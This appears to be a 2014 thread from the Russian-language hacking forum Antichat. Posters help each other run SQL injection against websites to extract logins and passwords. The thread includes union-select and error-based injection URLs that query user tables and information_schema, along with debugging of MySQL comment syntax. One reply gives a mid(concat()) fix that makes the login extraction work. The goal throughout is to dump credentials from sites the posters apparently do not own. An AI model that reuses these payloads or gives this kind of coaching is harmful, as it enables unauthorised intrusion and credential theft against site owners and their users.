ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.07.2014, 01:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от billybonse
billybonse said:
Сильно не пинайте за нубский вопрос...
Нахожу sql иньекцию, раскручиваю, просматриваю таблицы и колонки, нигде ничего похожего на user, members, accounts, passwords нет. Пароли обязательно в базе должны быть?
Пароли никому и ничего не должны. Как уже сказано, вариантов тут масса. Храниение паролей в таблице вроде "users" - просто общепринятый вариант.
Для начала найдите админку. Ее может и не быть вообще. Пароли могут быть жестко вписаны в исходник или может стоять basic-авторизация. В таком случае вам нужно смотреть в сторону вектора с доступом к файлам.
|
|
|
|
23.07.2014, 01:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
12164
Репутация:
1
|
|
madhatter, спасибо за ответ.
И еще вопрос.
Нашел уязвимость, таблица phpbb_acl_users, колонка user_id
Пишу http://www.site.com/pages.php?id=-10%20union%20select%201,user_id,3,4,5,6,7,8,9,10%2 0from%20phpbb_acl_users%20limit%200,1--
Выдает ошибку Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mamacass/public_html/pages.php on line 12
Что я делаю не так?
|
|
|
|
23.07.2014, 12:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
1141
Репутация:
0
|
|
Могу ошибаться, но комментарий в MySQL должен быть пробел два дефиса пробел и что-то еще.
|
|
|
|
23.07.2014, 12:30
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от TankreD
TankreD said:
Могу ошибаться, но комментарий в MySQL должен быть пробел два дефиса пробел и что-то еще.
Ошибаешься
|
|
|
23.07.2014, 13:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
1141
Репутация:
0
|
|
Сообщение от kingbeef
kingbeef said:
From a “-- ” sequence to the end of the line. In MySQL, the “-- ” (double-dash) comment style requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on). This syntax differs slightly from standard SQL comment syntax, as discussed in Section 1.8.2.5, “'--' as the Start of a Comment”.
Проверил. Нет, не ошибаюсь.
|
|
|
|
23.07.2014, 13:51
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от TankreD
TankreD said:
Проверил. Нет, не ошибаюсь.
Перед однострочным комментарием должен быть.
Так же есть многострочные комментарии.
Можно обойтись и без комментариев.
|
|
|
|
23.07.2014, 16:40
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Ни до, ни после однострочного комментария наличие пробела не обязательно.
kingbeef,Лучше не отвечайте, когда не знаете правильного ответа на вопрос.
billybonse,А после чего появилась такая ошибка? Что получается выводить, а что нет?
Сообщение от Cybersteger
Cybersteger said:
[название бд сайта]- узнайте запросом
http://www.site.com/pages.php?id=-15+union+select+1,2,database(),4,5,6,7--
Название БД хранится в поле TABLE_SCHEMA соответствующих таблиц.
Сообщение от Грабитель
Грабитель said:
Есть возможность крутить SQL как error-based, но все паблик способы раскрутки опять же требуют наличие запятых.
Кто подскажет, буду признателен. Благодарю за внимание.
https://rdot.org/forum/showpost.php?p=35143&postcount=40
https://rdot.org/forum/showthread.php?t=3167
|
|
|
|
23.07.2014, 18:28
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651
Репутация:
-5
|
|
Добрый день! Есть сайт MySQL error based
Смотрите, при таком запросе, нормально выдает id юзера
Сообщение от None
siste.ru/?page=19 and(select 1 from(select count(*),concat((select (select (select concat(0x27,0x7e,user.id,0x27,0x7e) from `db_site`.user Order by id limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
Точно такой же запрос, для получения логина
Сообщение от None
site.ru/?page=19 and(select 1 from(select count(*),concat((select (select (select concat(0x27,0x7e,user.login,0x27,0x7e) from `db_site`.user Order by id limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
На что выдает ошибку Subquery returns more than 1 row
Подскажите пожалуйста как правильно составить запрос для того чтобы вывести логин юзера |
|
|
|
23.07.2014, 20:39
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от XAMEHA
XAMEHA said:
Ни до, ни после однострочного комментария наличие пробела не обязательно.
kingbeef,Лучше не отвечайте, когда не знаете правильного ответа на вопрос.
Если имеется ввиду "--" как однострочный коммент, то в MySQL для корректной обработки запроса использование пробела в конце обязательно. Подробнее тут.
Код:
Code:
mysql> select 1-- this is a comment
-> ;
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)
mysql> select 1--this is a comment
-> ;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'a comment' at line 1
mysql> select 1--1
-> ;
+------+
| 1--1 |
+------+
| 2 |
+------+
1 row in set (0.00 sec)
|
|
|
|
24.07.2014, 01:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Evil_Genius, а вы в mid оберните concat в подзапросе:
mid(concat(0x27,0x7e,user.login,0x27,0x7e),1,100)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
